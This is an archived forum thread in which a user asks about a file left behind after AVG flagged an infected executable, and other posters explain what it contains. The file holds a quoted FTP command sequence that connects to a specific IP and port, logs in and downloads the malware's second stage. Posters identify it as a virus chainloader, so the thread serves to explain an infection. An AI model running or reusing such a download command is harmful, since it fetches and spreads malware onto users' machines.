When downloading a file, AVG complained, and i told it to "heal" the problem file which i could not find later.
File "i" found after AVG virus notification of infected "wmsoft14674.exe" file; contained:
open 67.150.127.201 3832 user hlthmf hlthmf get wmsoft14674.exe quit
***** eof ***** Question: what does those lines mean and do? What if i put 67.150.127.201 in my hosts file, would that help? What is that 3832 mean? Thanks.
I guess that 3832 is a port number.
D from BC British Columbia Canada
Those look like ftp commands. I'm guessing that something hiccuped and, instead of fetching file wmsoft14674.exe, the process wrote these commands into the file intended for download.
I tried running 'open 67.150.127.201 3832' in an ftp session and it timed out. The server is probably down. Scripts like this, with no error trapping, behave strangely when the subsequent commands are run without an open connection.
-- Paul Hovnanian mailto:Paul@Hovnanian.com ------------------------------------------------------------------ >> Insert witty message here
They appear to be commands which would be fed into a command-line- oriented "FTP" program, to perform an Internet file transfer.
They would open an FTP connection to a specific TCP port (3832) at a specific IP address, "log in" with a nonsense username and password, and retrieve a file called "wmsoft14674.exe" from that system to yours, and then exit the FTP program.
The chances are very high that this is part of the virus's method of spreading itself from one system to another. It's a "two part" virus... a small part which gets into your system somehow (probably by exploiting a security weakness in some program), which then executes these commands via your PC's FTP client software and retrieves the rest of the virus. The "wmsoft14674.exe" file is probably the bulk of the virus, and is executed on your PC to start spreading the virus further.
Nope.
That's a specific TCP port number. The virus running on the infected system (which appears to be part of the "PAC-WEST MANAGED MODEM NAS POOL" according to "whois") is probably "listening" on that port, and responds to connections by downloading the virus.
--
Dave Platt AE6EO
Friends of Jade Warrior home page: http://www.radagast.org/jade-warrior
I do _not_ wish to receive unsolicited commercial email, and I will
boycott any company which has the gall to send me such ads!
Sounds like a frequently used chainloader technique. One of the problems with it is that the actual target file is often many megs in size. Virus or not, it is a damned unpleasant surprise for someone trying to download a program, malevolent or not, with no warning.
Yes; unpleasant is a useable term. This was the third time for me and i got curious.
ElectronDepot website is not affiliated with any of the manufacturers or service providers discussed here. All logos and trade names are the property of their respective owners.